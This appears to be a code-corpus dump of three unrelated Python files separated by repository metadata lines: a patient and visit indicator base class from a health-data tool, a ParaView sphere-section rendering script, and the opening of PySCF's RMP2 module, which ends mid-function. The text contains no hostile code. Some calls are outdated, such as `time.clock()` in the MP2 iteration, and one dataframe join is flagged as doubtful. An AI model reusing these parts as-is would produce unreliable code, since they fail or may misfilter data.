    def __init__(self, fuchia_database):
        # All the filter_* methods below read dataframes off this database.
        self.fuchia_database = fuchia_database
    @property
    def patients_dataframe(self):
        """Patients dataframe from the underlying Fuchia database."""
        return self.fuchia_database.patients_dataframe
    @property
    def visits_dataframe(self):
        """Visits dataframe from the underlying Fuchia database."""
        return self.fuchia_database.visits_dataframe
    @property
    def patient_drugs_dataframe(self):
        """Patient-level drug prescriptions dataframe."""
        return self.fuchia_database.patient_drugs_dataframe
    @property
    def visit_drugs_dataframe(self):
        """Visit-level drug prescriptions dataframe."""
        return self.fuchia_database.visit_drugs_dataframe
    @classmethod
    def get_key(cls):
        """Unique registry key for this indicator (abstract)."""
        raise NotImplementedError()
    @classmethod
    def get_display_label(cls):
        """Human-readable label; defaults to the registry key."""
        return cls.get_key()
    def filter_patients_at_date(self, limit_date, start_date=None,
                                include_null_dates=False):
        """
        Filter the patients dataframe to only retain those who entered the
        follow up before the limit date. For each patient, also compute the
        age at the given limit age and add it in a new column called
        'age_at_date'.
        :param limit_date: The limit date (included) to filter on.
        :param start_date: If given, only return the patients who had a visit
            between the start_date and the limit date (both included).
        :param include_null_dates: If True, will include the patients with a null
            date.
        :return: The filtered dataframe.
        """
        if pd.isnull(limit_date):
            return self.patients_dataframe
        visits_filtered = self.filter_visits_at_date(
            limit_date,
            start_date=start_date,
            include_null_dates=include_null_dates
        )
        # Keep only patients having at least one visit in the window.
        c = self.patients_dataframe['id'].isin(visits_filtered['patient_id'])
        df = self.patients_dataframe[c]
        age_at_date_col = df.apply(
            lambda i: get_age_at_date(i, limit_date),
            axis=1
        )
        # On an empty selection return before assign(): apply() over an empty
        # frame does not yield a usable column.
        if len(df) == 0:
            return df
        return df.assign(age_at_date=age_at_date_col)
    def filter_visits_at_date(self, limit_date, start_date=None,
                              include_null_dates=False):
        """
        Filter the visits dataframe to only retain events that happened before
        the limit date.
        :param limit_date: The limit date (included) to filter on.
        :param start_date: If given, only return the visits between the
            start_date and the limit date (both included).
        :param include_null_dates: If True, will include the event with a null date.
        :return: The filtered dataframe.
        """
        if pd.isnull(limit_date):
            return self.visits_dataframe
        date_filter = (self.visits_dataframe['visit_date'] <= limit_date)
        if start_date:
            date_filter &= (self.visits_dataframe['visit_date'] >= start_date)
        if include_null_dates:
            null_filter = pd.isnull(self.visits_dataframe['visit_date'])
            return self.visits_dataframe[date_filter | null_filter]
        return self.visits_dataframe[date_filter]
    def filter_patients_by_category(self, limit_date, start_date=None,
                                    gender=None, age_min=None,
                                    age_max=None, age_is_null=False,
                                    include_null_dates=False):
        """
        Filter the patients dataframe with a limit date and a category.
        A category is a combination of a gender (male, female or both)
        constraint and one or two age constraints (min, max, min and max).
        Note that the min age constraint is greater or equal (>=)
        and the max age constraint is strictly lesser (<).
        :param limit_date: The limit date to filter on.
        :param start_date: If given, only return the patients who had a visit
            between the start_date and the limit date (both included).
        :param gender: The gender to filter on. None means both.
            None by default.
        :param age_min: The minimum age to filter on. None means no minimum.
            None by default.
        :param age_max: The maximum age to filter on. None means no maximum.
            None by default.
        :param age_is_null: If true, only return patients with a null value
            for the age.
        :param include_null_dates: If true, include patients with a null
            inclusion date. False by default.
        :return: The filtered dataframe.
        """
        df = self.filter_patients_at_date(
            limit_date,
            start_date=start_date,
            include_null_dates=include_null_dates
        )
        # Fake filter - Always true
        category_filter = pd.notnull(df['id'])
        if gender is not None:
            category_filter &= (df['gender'] == gender)
        if age_is_null:
            # age_is_null overrides the min/max constraints entirely.
            return df[category_filter & pd.isnull(df['age_at_date'])]
        if age_min is not None:
            category_filter &= (df['age_at_date'] >= age_min)
        if age_max is not None:
            category_filter &= (df['age_at_date'] < age_max)
        return df[category_filter]
    def filter_visits_by_category(self, limit_date, start_date=None,
                                  gender=None, age_min=None,
                                  age_max=None, age_is_null=False,
                                  include_null_dates=False):
        """
        Filter the visits dataframe with a limit date and a category.
        A category is a combination of a gender (male, female or both)
        constraint and one or two age constraints (min, max, min and max).
        Note that the min age constraint is greater or equal (>=)
        and the max age constraint is strictly lesser (<).
        :param limit_date: The limit date to filter on.
        :param start_date: If given, only return the visits between the
            start_date and the limit date (both included).
        :param gender: The gender to filter on. None means both.
        :param age_min: The minimum age to filter on. None means no minimum.
            None by default.
        :param age_max: The maximum age to filter on. None means no maximum.
            None by default.
        :param age_is_null: If true, only return patients with a null value
            for the age.
        :param include_null_dates: If true, include data with a null date.
            False by default.
        :return: The filtered dataframe.
        """
        patients = self.filter_patients_by_category(
            limit_date,
            start_date=start_date,
            include_null_dates=include_null_dates,
            gender=gender,
            age_min=age_min,
            age_max=age_max,
            age_is_null=age_is_null
        )
        visits = self.filter_visits_at_date(
            limit_date,
            start_date=start_date,
            include_null_dates=include_null_dates
        )
        # NOTE(review): this matches on the patients dataframe *index*,
        # while filter_patient_drugs_by_category below matches on
        # patients['id'] — confirm the index is the patient id here.
        df = visits[visits['patient_id'].isin(patients.index)]
        return df
    def filter_patient_drugs_by_category(self, limit_date, start_date=None,
                                         gender=None, age_min=None,
                                         age_max=None, age_is_null=False,
                                         include_null_dates=False):
        """Filter patient-level drug records by date and patient category.

        Keeps drug records whose 'beginning' is on or before limit_date and
        whose patient matches the given category (see
        filter_patients_by_category for parameter semantics).
        """
        patients = self.filter_patients_by_category(
            limit_date,
            start_date=start_date,
            include_null_dates=include_null_dates,
            gender=gender,
            age_min=age_min,
            age_max=age_max,
            age_is_null=age_is_null
        )
        df = self.patient_drugs_dataframe
        df = df[df['beginning'] <= limit_date]
        return df[df['patient_id'].isin(patients['id'])]
    def filter_visit_drugs_by_category(self, limit_date, start_date=None,
                                       gender=None, age_min=None,
                                       age_max=None, age_is_null=False,
                                       include_null_dates=False):
        """Filter visit-level drug records by date and patient category.

        Keeps drug records attached to visits that pass
        filter_visits_by_category (see that method for parameter semantics).
        """
        visits = self.filter_visits_by_category(
            limit_date,
            start_date=start_date,
            include_null_dates=include_null_dates,
            gender=gender,
            age_min=age_min,
            age_max=age_max,
            age_is_null=age_is_null
        )
        df = self.visit_drugs_dataframe
        return df[df['visit_id'].isin(visits['id'])]
    def get_value(self, limit_date, start_date=None, gender=None, age_min=None,
                  age_max=None, age_is_null=False, include_null_dates=False):
        """Compute the indicator value for the given period/category (abstract).

        NOTE(review): the combining subclasses below also pass a
        `post_filter_index` keyword that is not part of this base signature —
        concrete implementations apparently accept it; confirm.
        """
        raise NotImplementedError()
    def __neg__(self):
        # Indicators support arithmetic composition; each operator returns a
        # lazily-evaluated combined indicator.
        return NegIndicator(self)
    def __add__(self, other):
        return AdditionIndicator(self, other)
    def __sub__(self, other):
        return SubtractionIndicator(self, other)
    def __mul__(self, other):
        return MultiplicationIndicator(self, other)
    def __truediv__(self, other):
        return TrueDivisionIndicator(self, other)
class NegIndicator(BaseIndicator):
    """Indicator whose value is the negation of a wrapped indicator's value."""

    def __init__(self, indicator):
        super(NegIndicator, self).__init__(indicator.fuchia_database)
        self.indicator = indicator

    @classmethod
    def get_key(cls):
        # Combined indicators are anonymous: no key, never registered.
        raise NotImplementedError()

    def get_value(self, limit_date, start_date=None, gender=None, age_min=None,
                  age_max=None, age_is_null=False, include_null_dates=False,
                  post_filter_index=None):
        """Return -1 times the wrapped indicator's value for the same filters."""
        filters = {
            'start_date': start_date,
            'gender': gender,
            'age_min': age_min,
            'age_max': age_max,
            'age_is_null': age_is_null,
            'include_null_dates': include_null_dates,
            'post_filter_index': post_filter_index,
        }
        return -1 * self.indicator.get_value(limit_date, **filters)
class AdditionIndicator(BaseIndicator):
    """Indicator whose value is the sum of two indicators' values."""

    def __init__(self, indicator_a, indicator_b):
        super(AdditionIndicator, self).__init__(indicator_a.fuchia_database)
        self.indicator_a = indicator_a
        self.indicator_b = indicator_b

    @classmethod
    def get_key(cls):
        # Combined indicators are anonymous: no key, never registered.
        raise NotImplementedError()

    def get_value(self, limit_date, start_date=None, gender=None, age_min=None,
                  age_max=None, age_is_null=False, include_null_dates=False,
                  post_filter_index=None):
        """Evaluate both operands with identical filters and add the results."""
        filters = {
            'start_date': start_date,
            'gender': gender,
            'age_min': age_min,
            'age_max': age_max,
            'age_is_null': age_is_null,
            'include_null_dates': include_null_dates,
            'post_filter_index': post_filter_index,
        }
        return (self.indicator_a.get_value(limit_date, **filters)
                + self.indicator_b.get_value(limit_date, **filters))
class SubtractionIndicator(BaseIndicator):
    """Indicator whose value is the difference of two indicators' values."""

    def __init__(self, indicator_a, indicator_b):
        super(SubtractionIndicator, self).__init__(indicator_a.fuchia_database)
        self.indicator_a = indicator_a
        self.indicator_b = indicator_b

    @classmethod
    def get_key(cls):
        # Combined indicators are anonymous: no key, never registered.
        raise NotImplementedError()

    def get_value(self, limit_date, start_date=None, gender=None, age_min=None,
                  age_max=None, age_is_null=False, include_null_dates=False,
                  post_filter_index=None):
        """Evaluate both operands with identical filters and subtract b from a."""
        filters = {
            'start_date': start_date,
            'gender': gender,
            'age_min': age_min,
            'age_max': age_max,
            'age_is_null': age_is_null,
            'include_null_dates': include_null_dates,
            'post_filter_index': post_filter_index,
        }
        return (self.indicator_a.get_value(limit_date, **filters)
                - self.indicator_b.get_value(limit_date, **filters))
class MultiplicationIndicator(BaseIndicator):
    """Indicator whose value is the product of two indicators' values."""

    def __init__(self, indicator_a, indicator_b):
        super(MultiplicationIndicator, self).__init__(indicator_a.fuchia_database)
        self.indicator_a = indicator_a
        self.indicator_b = indicator_b

    @classmethod
    def get_key(cls):
        # Combined indicators are anonymous: no key, never registered.
        raise NotImplementedError()

    def get_value(self, limit_date, start_date=None, gender=None, age_min=None,
                  age_max=None, age_is_null=False, include_null_dates=False,
                  post_filter_index=None):
        """Evaluate both operands with identical filters and multiply them."""
        filters = {
            'start_date': start_date,
            'gender': gender,
            'age_min': age_min,
            'age_max': age_max,
            'age_is_null': age_is_null,
            'include_null_dates': include_null_dates,
            'post_filter_index': post_filter_index,
        }
        return (self.indicator_a.get_value(limit_date, **filters)
                * self.indicator_b.get_value(limit_date, **filters))
class TrueDivisionIndicator(BaseIndicator):
    """Indicator whose value is the ratio of two indicators' values.

    Returns None (rather than raising) when the denominator is zero.
    """

    def __init__(self, indicator_a, indicator_b):
        super(TrueDivisionIndicator, self).__init__(indicator_a.fuchia_database)
        self.indicator_a = indicator_a
        self.indicator_b = indicator_b

    @classmethod
    def get_key(cls):
        # Combined indicators are anonymous: no key, never registered.
        raise NotImplementedError()

    def get_value(self, limit_date, start_date=None, gender=None, age_min=None,
                  age_max=None, age_is_null=False, include_null_dates=False,
                  post_filter_index=None):
        """Evaluate both operands with identical filters and divide a by b."""
        filters = {
            'start_date': start_date,
            'gender': gender,
            'age_min': age_min,
            'age_max': age_max,
            'age_is_null': age_is_null,
            'include_null_dates': include_null_dates,
            'post_filter_index': post_filter_index,
        }
        numerator = self.indicator_a.get_value(limit_date, **filters)
        denominator = self.indicator_b.get_value(limit_date, **filters)
        if denominator == 0:
            return None
        return numerator / denominator
def get_age_at_date(patient_record, limit_date):
    """Compute a patient's age in whole years at ``limit_date``.

    Uses the birth date when available; otherwise falls back to the recorded
    (age, age_unit, age_date) triple, projecting the recorded age forward to
    limit_date.  Months count as 30 days and years as 365 days, matching the
    final integer division.

    :param patient_record: mapping/row with 'birth_date', 'age', 'age_unit'
        and 'age_date' fields.
    :param limit_date: date (with a .date() method, e.g. pandas Timestamp)
        at which to evaluate the age.
    :return: age in years (int) or None when it cannot be determined.
    """
    birth_date = patient_record['birth_date']
    if not pd.isnull(birth_date):
        age_in_days = (limit_date.date() - birth_date.date()).days
    else:
        age = patient_record['age']
        age_unit = patient_record['age_unit']
        age_date = patient_record['age_date']
        # Without both a recorded age and the date it was recorded at,
        # the age is unknown.  (This also makes the notnull/None re-checks
        # of the original implementation redundant.)
        if pd.isnull(age_date) or pd.isnull(age):
            return None
        delta_in_days = (limit_date.date() - age_date.date()).days
        if age_unit == constants.MONTH_UNIT:
            age_in_days = age * 30
        elif age_unit == constants.YEAR_UNIT:
            age_in_days = age * 365
        elif age_unit == constants.DAY_UNIT:
            age_in_days = age
        else:
            # Unknown age unit: the original code crashed here with
            # `None += int` (TypeError); treat it as an unknown age instead.
            return None
        age_in_days += delta_in_days
    return age_in_days // 365
|
Solthis/Fugen-2.0
|
data/indicators/base_indicator.py
|
Python
|
gpl-3.0
| 17,399
|
[
"VisIt"
] |
651c897018a1e0d2eccfa93b548e52a2ac323659faba5f1945bde8d184479b59
|
#!/usr/bin/pvpython
# Script taken from paraview's "python trace", with slighly renaming and deleting unnecessary code
# To be run by pvpython or Paraview, not Yade (!)
# In paraview: Tools -> Python shell, then click Run Script and choose this file
# should correspond to the values in export_text.py
from __future__ import print_function
center = (5,5,5)
normal = (1,1,1)
maxRadius = 1.5
from paraview.simple import *
view = GetActiveViewOrCreate('RenderView')
testvtk = LegacyVTKReader(FileNames=['/tmp/test.vtk'],guiName="test.vtk")
glyph1 = Glyph(Input=testvtk, GlyphType='Sphere', Scalars=['POINTS','radius'])
glyph1.GlyphType.Radius = 1.0
glyph1.GlyphType.ThetaResolution = 16
glyph1.GlyphType.PhiResolution = 16
glyph1.ScaleMode = 'scalar'
glyph1.ScaleFactor = 1.0
glyph1.GlyphMode = 'All Points'
clip = Clip(Input=glyph1)
clip.ClipType.Origin = center
clip.ClipType.Normal = normal
testSectionvtk = LegacyVTKReader(FileNames=['/tmp/testSection.vtk'], guiName="testSection.vtk" )
sections = Glyph(Input=testSectionvtk, GlyphType='Cylinder', Vectors=['POINTS','normal'], Scalars=['POINTS','radius'])
sections.GlyphType.Height = 0.01
sections.GlyphType.Radius = 1.0
sections.GlyphType.Resolution = 16
sections.GlyphTransform.Rotate = [0.0, 0.0, -90.0]
sections.ScaleMode = 'scalar'
sections.ScaleFactor = 1.0
sections.GlyphMode = 'All Points'
clipDisplay = Show(clip, view)
ColorBy(clipDisplay, ('POINTS', 'radius'))
radiusLUT = GetColorTransferFunction('radius')
radiusLUT.RescaleTransferFunction(0.0, maxRadius)
# either this:
# HideScalarBarIfNotNeeded(radiusLUT, view)
# or this command:
# clipDisplay.SetScalarBarVisibility(view, False)
# depending on paraview version. Can we chack paraview version inside script? Maybe https://public.kitware.com/pipermail/paraview/2014-May/031180.html
sectionsDisplay = Show(sections, view)
ColorBy(sectionsDisplay, ('POINTS', 'radiusOrig'))
radiusOrigLUT = GetColorTransferFunction('radiusOrig')
radiusOrigLUT.RescaleTransferFunction(0.0, maxRadius)
# either this:
# HideScalarBarIfNotNeeded(radiusOrigLUT, view)
# or this command:
# sectionsDisplay.SetScalarBarVisibility(view, False)
# depending on paraview version. Can we chack paraview version inside script? Maybe https://public.kitware.com/pipermail/paraview/2014-May/031180.html
SetActiveSource(sections)
view.ResetCamera()
view.OrientationAxesVisibility = False
view.Background = [1.0, 1.0, 1.0]
view.ViewSize = [600,600]
view.CameraFocalPoint = center
view.CameraPosition = [-10,12,-16]
view.CameraViewUp = [1,0,0]
view.CameraParallelScale = 0
RenderAllViews()
out = "/tmp/test.png"
SaveScreenshot(out)
print("Screenshot saved to {}".format(out))
|
cosurgi/trunk
|
examples/test/paraview-spheres-solid-section/pv_section.py
|
Python
|
gpl-2.0
| 2,679
|
[
"ParaView",
"VTK"
] |
5147e5d4c299eecc9b128d712b6588ddef70e29dcec506c43e7d29a37567b86e
|
#!/usr/bin/env python
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
RMP2
'''
import time
from functools import reduce
import copy
import numpy
from pyscf import gto
from pyscf import lib
from pyscf.lib import logger
from pyscf import ao2mo
from pyscf.ao2mo import _ao2mo
from pyscf import __config__
# Whether kernel() builds and returns the T2 amplitudes by default
# (overridable via the 'mp_mp2_with_t2' entry of pyscf's __config__).
WITH_T2 = getattr(__config__, 'mp_mp2_with_t2', True)
def kernel(mp, mo_energy=None, mo_coeff=None, eris=None, with_t2=WITH_T2, verbose=None):
    """Canonical RMP2 correlation energy (and optionally T2 amplitudes).

    :param mp: MP2 object providing nocc, nmo, frozen and ao2mo().
    :param mo_energy: orbital energies; taken from eris when omitted.
    :param mo_coeff: MO coefficients used to build eris when eris is omitted.
    :param eris: integral container with .ovov and .mo_energy.
    :param with_t2: if True, also build the full T2 amplitude tensor.
    :return: (emp2, t2) — real correlation energy, and t2 of shape
        (nocc, nocc, nvir, nvir) or None when with_t2 is False.
    """
    if mo_energy is not None or mo_coeff is not None:
        # For backward compatibility. In pyscf-1.4 or earlier, mp.frozen is
        # not supported when mo_energy or mo_coeff is given.
        assert(mp.frozen == 0 or mp.frozen is None)
    if eris is None:
        eris = mp.ao2mo(mo_coeff)
    if mo_energy is None:
        mo_energy = eris.mo_energy
    nocc = mp.nocc
    nvir = mp.nmo - nocc
    # Orbital-energy denominators e_i - e_a.
    eia = mo_energy[:nocc,None] - mo_energy[None,nocc:]
    if with_t2:
        t2 = numpy.empty((nocc,nocc,nvir,nvir), dtype=eris.ovov.dtype)
    else:
        t2 = None
    emp2 = 0
    # Accumulate one occupied orbital at a time to keep the working set small.
    for i in range(nocc):
        if isinstance(eris.ovov, numpy.ndarray) and eris.ovov.ndim == 4:
            # When mf._eri is a custom integrals with the shape (n,n,n,n), the
            # ovov integrals might be in a 4-index tensor.
            gi = eris.ovov[i]
        else:
            gi = numpy.asarray(eris.ovov[i*nvir:(i+1)*nvir])
        gi = gi.reshape(nvir,nocc,nvir).transpose(1,0,2)
        t2i = gi.conj()/lib.direct_sum('jb+a->jba', eia, eia[i])
        # Closed-shell 2*J - K energy contraction for this occupied index.
        emp2 += numpy.einsum('jab,jab', t2i, gi) * 2
        emp2 -= numpy.einsum('jab,jba', t2i, gi)
        if with_t2:
            t2[i] = t2i
    return emp2.real, t2
# Iteratively solve MP2 if non-canonical HF is provided
def _iterative_kernel(mp, eris, verbose=None):
cput1 = cput0 = (time.clock(), time.time())
log = logger.new_logger(mp, verbose)
emp2, t2 = mp.init_amps(eris=eris)
log.info('Init E(MP2) = %.15g', emp2)
adiis = lib.diis.DIIS(mp)
conv = False
for istep in range(mp.max_cycle):
t2new = mp.update_amps(t2, eris)
if isinstance(t2new, numpy.ndarray):
normt = numpy.linalg.norm(t2new - t2)
t2 = None
t2new = adiis.update(t2new)
else: # UMP2
normt = numpy.linalg.norm([numpy.linalg.norm(t2new[i] - t2[i])
for i in range(3)])
t2 = None
t2shape = [x.shape for x in t2new]
t2new = numpy.hstack([x.ravel() for x in t2new])
t2new = adiis.update(t2new)
t2new = lib.split_reshape(t2new, t2shape)
t2, t2new = t2new, None
emp2, e_last = mp.energy(t2, eris), emp2
log.info('cycle = %d E_corr(MP2) = %.15g dE = %.9g norm(t2) = %.6g',
istep+1, emp2, emp2 - e_last, normt)
cput1 = log.timer('MP2 iter', *cput1)
if abs(emp2-e_last) < mp.conv_tol and normt < mp.conv_tol_normt:
conv = True
break
log.timer('MP2', *cput0)
return conv, emp2, t2
def energy(mp, t2, eris):
    '''MP2 correlation energy from given t2 amplitudes.

    E = 2 * sum t2[ijab] (ia|jb) - sum t2[ijab] (ib|ja), contracted with
    the (ov|ov) integrals stored in eris.ovov.
    '''
    n_occ, n_vir = t2.shape[1], t2.shape[2]
    ovov = numpy.asarray(eris.ovov).reshape(n_occ, n_vir, n_occ, n_vir)
    e_direct = numpy.einsum('ijab,iajb', t2, ovov)
    e_exchange = numpy.einsum('ijab,ibja', t2, ovov)
    return (e_direct * 2 - e_exchange).real
def update_amps(mp, t2, eris):
    '''One amplitude-update step for non-canonical MP2.

    Builds the residual from the off-diagonal Fock blocks plus the (ov|ov)
    integrals and divides by the orbital-energy denominators.
    '''
    n_occ, n_vir = t2.shape[1], t2.shape[2]
    e_occ = eris.mo_energy[:n_occ]
    # level_shift pushes virtual energies up to stabilize the iterations.
    e_vir = eris.mo_energy[n_occ:] + mp.level_shift
    # Off-diagonal Fock pieces; these vanish for canonical orbitals.
    f_oo = eris.fock[:n_occ, :n_occ] - numpy.diag(e_occ)
    f_vv = eris.fock[n_occ:, n_occ:] - numpy.diag(e_vir)
    new_t2 = lib.einsum('ijac,bc->ijab', t2, f_vv)
    new_t2 -= lib.einsum('ki,kjab->ijab', f_oo, t2)
    # Symmetrize over simultaneous (i<->j, a<->b) exchange.
    new_t2 = new_t2 + new_t2.transpose(1, 0, 3, 2)
    ovov = numpy.asarray(eris.ovov).reshape(n_occ, n_vir, n_occ, n_vir)
    new_t2 += ovov.conj().transpose(0, 2, 1, 3)
    ovov = None  # release the large intermediate early
    e_ia = e_occ[:, None] - e_vir
    new_t2 /= lib.direct_sum('ia,jb->ijab', e_ia, e_ia)
    return new_t2
def make_rdm1(mp, t2=None, eris=None, ao_repr=False):
    '''Spin-traced MP2 one-particle density matrix.

    The occupied-virtual orbital response is not included, so the ov/vo
    blocks of the correlation part are zero.  Convention (McWeeney,
    Eq (5.4.20)): dm1[p,q] = <q_alpha^+ p_alpha> + <q_beta^+ p_beta>, and
    the energy contraction is E = einsum('pq,qp', h1, rdm1).

    Kwargs:
        ao_repr : boolean
            Whether to transform the 1-particle density matrix into the
            AO representation.
    '''
    from pyscf.cc import ccsd_rdm
    d_oo, d_vv = _gamma1_intermediates(mp, t2, eris)
    n_occ = d_oo.shape[0]
    n_vir = d_vv.shape[0]
    # No orbital response at the MP2 level: ov/vo correlation blocks vanish.
    d_ov = numpy.zeros((n_occ, n_vir), dtype=d_oo.dtype)
    blocks = (d_oo, d_ov, d_ov.T, d_vv)
    return ccsd_rdm._make_rdm1(mp, blocks, with_frozen=True, ao_repr=ao_repr)
def _gamma1_intermediates(mp, t2=None, eris=None):
if t2 is None: t2 = mp.t2
nmo = mp.nmo
nocc = mp.nocc
nvir = nmo - nocc
if t2 is None:
if eris is None:
eris = mp.ao2mo()
mo_energy = eris.mo_energy
eia = mo_energy[:nocc,None] - mo_energy[None,nocc:]
dtype = eris.ovov.dtype
else:
dtype = t2.dtype
dm1occ = numpy.zeros((nocc,nocc), dtype=dtype)
dm1vir = numpy.zeros((nvir,nvir), dtype=dtype)
for i in range(nocc):
if t2 is None:
gi = numpy.asarray(eris.ovov[i*nvir:(i+1)*nvir])
gi = gi.reshape(nvir,nocc,nvir).transpose(1,0,2)
t2i = gi.conj()/lib.direct_sum('jb+a->jba', eia, eia[i])
else:
t2i = t2[i]
l2i = t2i.conj()
dm1vir += numpy.einsum('jca,jcb->ba', l2i, t2i) * 2 \
- numpy.einsum('jca,jbc->ba', l2i, t2i)
dm1occ += numpy.einsum('iab,jab->ij', l2i, t2i) * 2 \
- numpy.einsum('iab,jba->ij', l2i, t2i)
return -dm1occ, dm1vir
def make_rdm2(mp, t2=None, eris=None, ao_repr=False):
    r'''
    Spin-traced two-particle density matrix in MO basis
    dm2[p,q,r,s] = \sum_{sigma,tau} <p_sigma^\dagger r_tau^\dagger s_tau q_sigma>
    Note the contraction between ERIs (in Chemist's notation) and rdm2 is
    E = einsum('pqrs,pqrs', eri, rdm2)

    Kwargs:
        ao_repr : boolean
            Whether to transform the density matrix into the AO basis.
    '''
    if t2 is None: t2 = mp.t2
    # nmo0/nocc0 refer to the full orbital space (frozen orbitals included);
    # nmo/nocc are the active-space counts used for the t2 amplitudes.
    nmo = nmo0 = mp.nmo
    nocc = nocc0 = mp.nocc
    nvir = nmo - nocc
    if t2 is None:
        # t2 not stored: rebuild amplitudes from the (ov|ov) integrals below.
        if eris is None:
            eris = mp.ao2mo()
        mo_energy = eris.mo_energy
        eia = mo_energy[:nocc,None] - mo_energy[None,nocc:]
    if mp.frozen is not None:
        nmo0 = mp.mo_occ.size
        nocc0 = numpy.count_nonzero(mp.mo_occ > 0)
        # Scatter indices that map active orbitals into the full space.
        moidx = get_frozen_mask(mp)
        oidx = numpy.where(moidx & (mp.mo_occ > 0))[0]
        vidx = numpy.where(moidx & (mp.mo_occ ==0))[0]
    else:
        moidx = oidx = vidx = None
    dm1 = make_rdm1(mp, t2, eris)
    # Remove the HF part of dm1; it is added back explicitly further down.
    dm1[numpy.diag_indices(nocc0)] -= 2
    dm2 = numpy.zeros((nmo0,nmo0,nmo0,nmo0), dtype=dm1.dtype) # Chemist notation
    #dm2[:nocc,nocc:,:nocc,nocc:] = t2.transpose(0,3,1,2)*2 - t2.transpose(0,2,1,3)
    #dm2[nocc:,:nocc,nocc:,:nocc] = t2.transpose(3,0,2,1)*2 - t2.transpose(2,0,3,1)
    for i in range(nocc):
        if t2 is None:
            gi = numpy.asarray(eris.ovov[i*nvir:(i+1)*nvir])
            gi = gi.reshape(nvir,nocc,nvir).transpose(1,0,2)
            t2i = gi.conj()/lib.direct_sum('jb+a->jba', eia, eia[i])
        else:
            t2i = t2[i]
        # dm2 was computed as dm2[p,q,r,s] = < p^\dagger r^\dagger s q > in the
        # above. Transposing it so that it be contracted with ERIs (in Chemist's
        # notation):
        # E = einsum('pqrs,pqrs', eri, rdm2)
        dovov = t2i.transpose(1,0,2)*2 - t2i.transpose(2,0,1)
        dovov *= 2
        if moidx is None:
            dm2[i,nocc:,:nocc,nocc:] = dovov
            dm2[nocc:,i,nocc:,:nocc] = dovov.conj().transpose(0,2,1)
        else:
            # Frozen orbitals present: scatter into the full orbital space.
            dm2[oidx[i],vidx[:,None,None],oidx[:,None],vidx] = dovov
            dm2[vidx[:,None,None],oidx[i],vidx[:,None],oidx] = dovov.conj().transpose(0,2,1)
    # Be careful with convention of dm1 and dm2
    #   dm1[q,p] = <p^\dagger q>
    #   dm2[p,q,r,s] = < p^\dagger r^\dagger s q >
    #   E = einsum('pq,qp', h1, dm1) + .5 * einsum('pqrs,pqrs', eri, dm2)
    # When adding dm1 contribution, dm1 subscripts need to be flipped
    for i in range(nocc0):
        dm2[i,i,:,:] += dm1.T * 2
        dm2[:,:,i,i] += dm1.T * 2
        dm2[:,i,i,:] -= dm1.T
        dm2[i,:,:,i] -= dm1
    # Hartree-Fock part of the 2-RDM (Coulomb minus exchange).
    for i in range(nocc0):
        for j in range(nocc0):
            dm2[i,i,j,j] += 4
            dm2[i,j,j,i] -= 2
    if ao_repr:
        from pyscf.cc import ccsd_rdm
        dm2 = ccsd_rdm._rdm2_mo2ao(dm2, mp.mo_coeff)
    return dm2
def get_nocc(mp):
    '''Number of active (non-frozen) occupied orbitals.'''
    if mp._nocc is not None:
        # Explicit user override takes precedence over the frozen spec.
        return mp._nocc
    frozen = mp.frozen
    if frozen is None:
        count = numpy.count_nonzero(mp.mo_occ > 0)
    elif isinstance(frozen, (int, numpy.integer)):
        # An integer freezes that many inner-most (occupied) orbitals.
        count = numpy.count_nonzero(mp.mo_occ > 0) - frozen
    elif isinstance(frozen[0], (int, numpy.integer)):
        # A list gives explicit 0-based orbital indices to freeze.
        active_occ = mp.mo_occ > 0
        active_occ[list(frozen)] = False
        count = numpy.count_nonzero(active_occ)
    else:
        raise NotImplementedError
    assert(count > 0)
    return count
def get_nmo(mp):
    '''Number of active (non-frozen) molecular orbitals.'''
    if mp._nmo is not None:
        # Explicit user override takes precedence over the frozen spec.
        return mp._nmo
    frozen = mp.frozen
    if frozen is None:
        return len(mp.mo_occ)
    if isinstance(frozen, (int, numpy.integer)):
        return len(mp.mo_occ) - frozen
    if isinstance(frozen[0], (int, numpy.integer)):
        # Duplicate indices in the frozen list are only counted once.
        return len(mp.mo_occ) - len(set(frozen))
    raise NotImplementedError
def get_frozen_mask(mp):
    '''Get boolean mask for the restricted reference orbitals.

    In the returned boolean (mask) array of frozen orbital indices, the
    element is False if it corresponds to a frozen orbital.
    '''
    # Use the builtin bool: numpy.bool was deprecated in numpy 1.20 and
    # removed in numpy 1.24, so dtype=numpy.bool breaks on modern numpy.
    moidx = numpy.ones(mp.mo_occ.size, dtype=bool)
    if mp._nmo is not None:
        # User fixed the active-space size explicitly: freeze the tail.
        moidx[mp._nmo:] = False
    elif mp.frozen is None:
        pass
    elif isinstance(mp.frozen, (int, numpy.integer)):
        # Integer spec freezes the lowest mp.frozen orbitals.
        moidx[:mp.frozen] = False
    elif len(mp.frozen) > 0:
        # List spec freezes the given 0-based orbital indices.
        moidx[list(mp.frozen)] = False
    else:
        raise NotImplementedError
    return moidx
def as_scanner(mp):
    '''Generating a scanner/solver for MP2 PES.
    The returned solver is a function. This function requires one argument
    "mol" as input and returns total MP2 energy.
    The solver will automatically use the results of last calculation as the
    initial guess of the new calculation. All parameters assigned in the
    MP2 and the underlying SCF objects (conv_tol, max_memory etc) are
    automatically applied in the solver.
    Note scanner has side effects. It may change many underlying objects
    (_scf, with_df, with_x2c, ...) during calculation.
    Examples::
    >>> from pyscf import gto, scf, mp
    >>> mol = gto.M(atom='H 0 0 0; F 0 0 1')
    >>> mp2_scanner = mp.MP2(scf.RHF(mol)).as_scanner()
    >>> e_tot = mp2_scanner(gto.M(atom='H 0 0 0; F 0 0 1.1'))
    >>> e_tot = mp2_scanner(gto.M(atom='H 0 0 0; F 0 0 1.5'))
    '''
    # Already wrapped: return unchanged so as_scanner is idempotent.
    if isinstance(mp, lib.SinglePointScanner):
        return mp
    logger.info(mp, 'Set %s as a scanner', mp.__class__)
    class MP2_Scanner(mp.__class__, lib.SinglePointScanner):
        def __init__(self, mp):
            # Share state with the wrapped object; the SCF scanner drives HF.
            self.__dict__.update(mp.__dict__)
            self._scf = mp._scf.as_scanner()
        def __call__(self, mol_or_geom, **kwargs):
            # Accept either a Mole object or a raw geometry specification.
            if isinstance(mol_or_geom, gto.Mole):
                mol = mol_or_geom
            else:
